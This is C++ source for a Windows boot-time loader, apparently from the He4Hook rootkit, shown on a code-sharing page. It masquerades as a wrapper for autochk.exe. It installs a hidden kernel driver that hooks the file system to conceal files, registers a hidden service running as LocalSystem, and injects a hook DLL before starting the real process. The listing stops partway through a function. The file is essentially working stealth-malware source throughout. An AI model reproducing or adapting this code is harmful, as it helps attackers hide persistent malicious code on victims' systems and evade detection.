?? he4boot.cpp
字號:
#include "ntdll.h"
#include "He4HookBootDriverHide\He4HookBootDriverHide.hpp"
#include "He4NDISBootDriver\He4NDISBootDriver.hpp"
//#define __HE4_BOOT_DEBUG
//#define __HE4_BOOT_INSTALL_NDIS
#define HE4_BOOT_SERVICE_NAME L"He4HookInv"
#define HE4_BOOT_SERVICE_FILE_NAME L"System32\\DRIVERS\\He4HookInv.sys"
#define HE4_BOOT_NDIS_SERVICE_FILE_NAME L"System32\\DRIVERS\\He4NDIS.sys"
#define HE4_BOOT_WIN32_SERVICE_NAME L"He4Win32Srv"
//#define HE4_BOOT_WIN32_SERVICE_FILE_NAME L"%SystemRoot%\\system32\\He4Win32Srv.exe"
#define HE4_BOOT_WIN32_SERVICE_FILE_NAME L"System32\\He4Win32Srv.exe"
//\\??\\E:\\WinNT\\
VOID BEDisplayString(PWSTR lpszString);
VOID RtlExitUserProcess(ULONG ExitCode);
void InstallWin32Service(void);
void InstallHookDLL(PWSTR pDLLName, PPEB Peb);
void InstallDevice(void);
BOOLEAN CheckFileExist(PWSTR lpszFileName, BOOLEAN bFullName);
ULONG GetSystemDirectory(PWSTR lpBuffer, ULONG uSize);
void StartRealProcess(PWSTR IntruderProcessName);
HANDLE hFileLog = 0;
void OpenLog(void);
void CloseLog(void);
void WriteLog(void* pBuffer, ULONG dwSize);
int w_main(int nArgCount, WCHAR *Arg[], WCHAR *Env[]);
#define HE4_DLL_NAME L"he4r31.dll" //"HookKey.dll"
void mainBootExecute(PPEB Peb)
{
NTSTATUS NtStatus;
int nReturn = -1;
PWSTR pPtr;
PWSTR pCommandLine = 0;
ULONG SizeCommandLine = 0;
int nArgCount = 0;
PWSTR *Arg = 0;
ULONG SizeArg = 0;
PWSTR pEnvironmentBlock = 0;
ULONG SizeEnvironmentBlock = 0;
int nEnvCount = 0;
PWSTR *Env = 0;
ULONG SizeEnv = 0;
#ifdef __HE4_BOOT_DEBUG
OpenLog();
BEDisplayString(L"\n\n mainBootExecute(PPEB Peb): Hello!!! This is wrapper to the autochk.exe\n");
#endif //__HE4_BOOT_DEBUG
if(Peb == 0)
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n\n mainBootExecute(PPEB Peb): Peb - ERROR !!!!!!\n");
#endif //__HE4_BOOT_DEBUG
CloseLog();
RtlExitUserProcess(nReturn);
}
if(Peb->pi == 0)
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n\n mainBootExecute(PPEB Peb): Peb->pi - ERROR !!!!!!\n");
#endif //__HE4_BOOT_DEBUG
CloseLog();
RtlExitUserProcess(nReturn);
}
RtlNormalizeProcessParams(Peb->pi);
//*********************************************************************//
// Parse CommandLine //
//*********************************************************************//
pCommandLine = 0;
SizeCommandLine = Peb->pi->CommandLine.Length + sizeof(WCHAR);
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, 0, &SizeCommandLine, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory is OK!!!");
#endif //__HE4_BOOT_DEBUG
memset(pCommandLine, 0, SizeCommandLine);
memcpy(pCommandLine, Peb->pi->CommandLine.Buffer, Peb->pi->CommandLine.Length);
nArgCount = 1;
SizeArg = sizeof(PWSTR);
pPtr = pCommandLine;
while((*pPtr) != UNICODE_NULL)
{
pPtr++;
if((*pPtr) == ((WCHAR)' '))
nArgCount++;
}
SizeArg = nArgCount*sizeof(PWSTR);
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&Arg, 0, &SizeArg, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for Arg is OK!!!");
#endif //__HE4_BOOT_DEBUG
memset(Arg, 0, SizeArg);
pPtr = pCommandLine;
Arg[0] = pCommandLine;
nArgCount = 1;
while((*pPtr) != UNICODE_NULL)
{
pPtr++;
if((*pPtr) == ((WCHAR)' '))
{
(*pPtr) = 0;
Arg[nArgCount] = pPtr+1;
nArgCount++;
}
}
}
else
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for Arg is ERROR!!!");
#endif //__HE4_BOOT_DEBUG
Arg = 0;
nArgCount = 0;
}
}
else
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory is ERROR!!!");
#endif //__HE4_BOOT_DEBUG
pCommandLine = 0;
//RtlExitUserProcess(nReturn);
}
//*********************************************************************//
// Parse EnvironmentBlock //
//*********************************************************************//
pPtr = (PWSTR)Peb->pi->EnvironmentBlock;
while((*((ULONG*)pPtr)) != 0)
{
SizeEnvironmentBlock++;
pPtr++;
}
SizeEnvironmentBlock *= 2;
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&pEnvironmentBlock, 0, &SizeEnvironmentBlock, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for EnvironmentBlock is OK!!!");
#endif //__HE4_BOOT_DEBUG
memset(pEnvironmentBlock, 0, SizeEnvironmentBlock);
memcpy(pEnvironmentBlock, Peb->pi->EnvironmentBlock, SizeEnvironmentBlock);
nEnvCount = 1;
SizeEnv = sizeof(PWSTR);
pPtr = pEnvironmentBlock;
while((*((ULONG*)pPtr)) != 0)
{
pPtr++;
if((*pPtr) == 0)
nEnvCount++;
}
SizeEnv = (nEnvCount+1)*sizeof(PWSTR);
NtStatus = NtAllocateVirtualMemory((HANDLE)-1, (PVOID*)&Env, 0, &SizeEnv, MEM_COMMIT, PAGE_READWRITE);
if(NT_SUCCESS(NtStatus))
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for Env is OK!!!");
#endif //__HE4_BOOT_DEBUG
memset(Env, 0, SizeEnv);
pPtr = pEnvironmentBlock;
Env[0] = pEnvironmentBlock;
nEnvCount = 1;
while((*((ULONG*)pPtr)) != 0)
{
pPtr++;
if((*pPtr) == 0)
{
(*pPtr) = 0;
Env[nEnvCount] = pPtr+1;
nEnvCount++;
}
}
}
else
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for Env is ERROR!!!");
#endif //__HE4_BOOT_DEBUG
Env = 0;
nEnvCount = 0;
}
}
else
{
#ifdef __HE4_BOOT_DEBUG
BEDisplayString(L"\n He4Boot: mainBootExecute(PPEB Peb) - NtAllocateVirtualMemory for EnvironmentBlock is ERROR!!!");
#endif //__HE4_BOOT_DEBUG
pEnvironmentBlock = 0;
}
//*********************************************************************//
// Call w_main(...) //
//*********************************************************************//
if(nArgCount && Arg && Env)
nReturn = w_main(nArgCount, Arg, Env);
else
nReturn = w_main(0, 0, 0);
//*********************************************************************//
//*********************************************************************//
//__Exit_mainBootExecute: // !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
//*********************************************************************//
// Free EnvironmentBlock //
//*********************************************************************//
if(Env && nEnvCount)
{
SizeEnv = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&Env, &SizeEnv, MEM_RELEASE);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for Env is ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for Env is OK!!!");
}
#endif //__HE4_BOOT_DEBUG
}
if(pEnvironmentBlock)
{
SizeEnvironmentBlock = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&pEnvironmentBlock, &SizeEnvironmentBlock, MEM_RELEASE);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for EnvironmentBlock is ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for EnvironmentBlock is OK!!!");
}
#endif //__HE4_BOOT_DEBUG
}
//*********************************************************************//
// Free CommandLine //
//*********************************************************************//
if(Arg && nArgCount)
{
SizeArg = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&Arg, &SizeArg, MEM_RELEASE);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for Arg is ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory for Arg is OK!!!");
}
#endif //__HE4_BOOT_DEBUG
}
if(pCommandLine)
{
SizeCommandLine = 0;
NtStatus = NtFreeVirtualMemory((HANDLE)-1, (PVOID*)&pCommandLine, &SizeCommandLine, MEM_RELEASE);
#ifdef __HE4_BOOT_DEBUG
if(!NT_SUCCESS(NtStatus))
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory is ERROR!!!");
}
else
{
BEDisplayString(L"\n He4Hook - NtFreeVirtualMemory is OK!!!");
}
#endif //__HE4_BOOT_DEBUG
}
CloseLog();
RtlExitUserProcess(nReturn);
}
int w_main(int nArgCount, WCHAR *Arg[], WCHAR *Env[])
{
#ifdef __HE4_BOOT_DEBUG
WCHAR Buf[255];
swprintf(Buf, L"\n nArgCount = %u\n", nArgCount);
BEDisplayString(Buf);
swprintf(Buf, L"\n Arg = %08X\n", Arg);
BEDisplayString(Buf);
swprintf(Buf, L"\n Env = %08X\n", Env);
BEDisplayString(Buf);
BEDisplayString(L"\n Arg list:");
for(int i=0; i<nArgCount; i++)
{
BEDisplayString(L"\n ");
BEDisplayString(Arg[i]);
}
BEDisplayString(L"\n Env list:");
i = 0;
if(Env)
{
while(Env[i] != 0)
{
BEDisplayString(L"\n ");
BEDisplayString(Env[i]);
i++;
}
}
BEDisplayString(L"\n");
#endif //__HE4_BOOT_DEBUG
InstallDevice();
InstallWin32Service();
if(nArgCount > 1)
{
if(CheckFileExist(Arg[1], FALSE))
{
InstallHookDLL(Arg[1], NtCurrentTeb()->peb);
}
else
{
InstallHookDLL(HE4_DLL_NAME, NtCurrentTeb()->peb);
}
}
else
{
InstallHookDLL(HE4_DLL_NAME, NtCurrentTeb()->peb);
}
if(Arg)
StartRealProcess(Arg[0]);
return 0;
}
void InstallWin32Service(void)
{
NtBootDriverControlHide *pNtBootDriverControlHide = new NtBootDriverControlHide(HE4_BOOT_WIN32_SERVICE_FILE_NAME);
if (pNtBootDriverControlHide)
{
if (pNtBootDriverControlHide->Result)
{
pNtBootDriverControlHide->Install(HE4_BOOT_WIN32_SERVICE_NAME, 0x110, 2, 1, L"LocalSystem");
}
delete pNtBootDriverControlHide;
}
}
void InstallDevice(void)
{
He4HookBootDriverHide *lpHe4HookBootDriverHide = new He4HookBootDriverHide(HE4_BOOT_SERVICE_FILE_NAME);
if(lpHe4HookBootDriverHide)
{
if(lpHe4HookBootDriverHide->Result)
{
lpHe4HookBootDriverHide->Install();
#ifndef __HE4_BOOT_DEBUG
lpHe4HookBootDriverHide->HookFileSystem(2);
#else
if (lpHe4HookBootDriverHide->HookFileSystem(2) == FALSE)
BEDisplayString(L"\n lpHe4HookBootDriverHide->HookFileSystem(2) = FALSE !!!");
else
BEDisplayString(L"\n lpHe4HookBootDriverHide->HookFileSystem(2) = TRUE !!!");
#endif //__HE4_BOOT_DEBUG
}
delete(lpHe4HookBootDriverHide);
}
#ifdef __HE4_BOOT_DEBUG
else
{
BEDisplayString(L"\n Class He4HookBootDriverHide don`t created !!!");
}
#endif //__HE4_BOOT_DEBUG
#ifdef __HE4_BOOT_INSTALL_NDIS
He4NDISBootDriver *lpHe4NDISBootDriver = new He4NDISBootDriver(HE4_BOOT_NDIS_SERVICE_FILE_NAME);
if(lpHe4NDISBootDriver)
{
if(lpHe4NDISBootDriver->Result)
{
lpHe4NDISBootDriver->Install();
}
delete(lpHe4NDISBootDriver);
}
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -